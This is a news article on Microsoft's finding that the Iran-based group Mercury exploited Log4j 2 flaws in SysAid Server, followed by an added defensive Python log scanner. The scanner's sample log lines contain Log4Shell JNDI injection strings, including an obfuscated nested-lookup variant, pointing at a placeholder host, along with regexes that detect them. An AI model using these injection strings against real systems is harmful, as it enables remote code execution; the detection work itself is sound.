Microsoft: Iranian Threat Actor Exploits Log4j 2 Vulnerabilities in SysAid Apps
The Microsoft Threat Intelligence Center (MSTIC) and Microsoft 365 Defender Research Team have found that Iran-based threat actor Mercury has been exploiting Log4j 2 vulnerabilities in SysAid applications, according to a prepared statement.
MSPs use SysAid for IT service management (ITSM), ticket automation, task automation, asset management and patch management.
A Closer Look at the Log4j 2 Vulnerabilities in SysAid Apps
MSTIC observed a Mercury threat actor exploiting vulnerable SysAid Server instances as its initial access vector on July 23 and 25, 2022. After the threat actor accessed these instances, it was able to dump user credentials, move laterally within the targeted organization and initiate a hands-on-keyboard attack.
In addition, the Mercury threat actor exploited Log4j 2 vulnerabilities to penetrate vulnerable SysAid Server instances, MSTIC reported. This has allowed the threat actor to attack organizations across Israel.
Mercury, the group behind the SysAid Server attacks, may be associated with Iran’s Ministry of Intelligence and Security. The attacks come after a Mercury threat actor used Log4j 2 exploits to attack VMware applications in 2022.
Protecting Against Log4j 2 Vulnerabilities in SysAid Apps
MSTIC offers several recommendations to help organizations guard against Log4j 2 vulnerabilities in SysAid apps, including:
- Find out if SysAid apps are in use; if so, apply security patches and updates to these apps.
- Review authentication activity for remote access and investigate any anomalous activity.
- Enable multi-factor authentication (MFA) to mitigate compromised credentials and ensure that MFA is enforced across all remote users.
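The second recommendation, reviewing remote access activity for anomalies, can be partly automated. The following is an added example (not from Microsoft, SysAid or the original article) that scans web access log lines for the Log4j 2 lookup pattern that the Log4Shell exploits rely on, flagging both an explicit JNDI lookup and any nested lookup, which ordinary requests never contain. The log format and all sample lines are constructed for the example; real SysAid logs may use a different shape.

```python
import re
from collections import Counter

# Constructed sample lines in a common access-log shape (not real SysAid logs).
SAMPLE_LOG = """\
10.0.0.5 - - [23/Jul/2022:10:01:02 +0000] "GET /Login.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [23/Jul/2022:10:01:05 +0000] "GET /Login.jsp HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"
10.0.0.9 - - [23/Jul/2022:10:01:07 +0000] "POST /api/v1/tickets?q=${${lower:j}ndi:rmi://example.invalid/b} HTTP/1.1" 500 0 "-" "curl/7.0"
10.0.0.7 - - [25/Jul/2022:11:20:00 +0000] "GET /static/app.js HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Explicit Log4j 2 JNDI lookup, e.g. ${jndi:ldap://...}
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# A lookup nested inside another lookup; legitimate clients never send this,
# so it catches variants that hide the word "jndi" behind other lookups.
NESTED_LOOKUP_RE = re.compile(r"\$\{[^}]*\$\{")
# Combined-style access log: src ident user [ts] "request" status size "referer" "user-agent"
ACCESS_LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

def classify(line):
    """Return a finding dict for a suspicious line, or None."""
    m = ACCESS_LINE_RE.match(line)
    if not m:
        return None
    reasons = []
    # Every attacker-controlled field that Log4j 2 might log is checked.
    for field in ("req", "ref", "ua"):
        value = m.group(field)
        if JNDI_RE.search(value):
            reasons.append(f"jndi lookup in {field}")
        elif NESTED_LOOKUP_RE.search(value):
            reasons.append(f"nested lookup in {field}")
    if not reasons:
        return None
    return {"src": m.group("src"), "ts": m.group("ts"), "reasons": reasons}

def scan(log_text):
    """All suspicious lines in the given log text, in order."""
    return [hit for hit in (classify(l) for l in log_text.splitlines()) if hit]

def suspicious_sources(log_text):
    """Count of flagged requests per source address, for triage."""
    return Counter(hit["src"] for hit in scan(log_text))

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
    print(suspicious_sources(SAMPLE_LOG))
```

A hit is only evidence of an attempt, not of a successful exploit; correlate flagged sources with outbound LDAP/RMI connections and new process activity on the SysAid host before concluding compromise.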
SysAid has also released a workaround to help users address Log4j 2 vulnerabilities in its apps. It has fixed the cloud and on-premises versions of its software and continues to monitor the situation and adapt accordingly.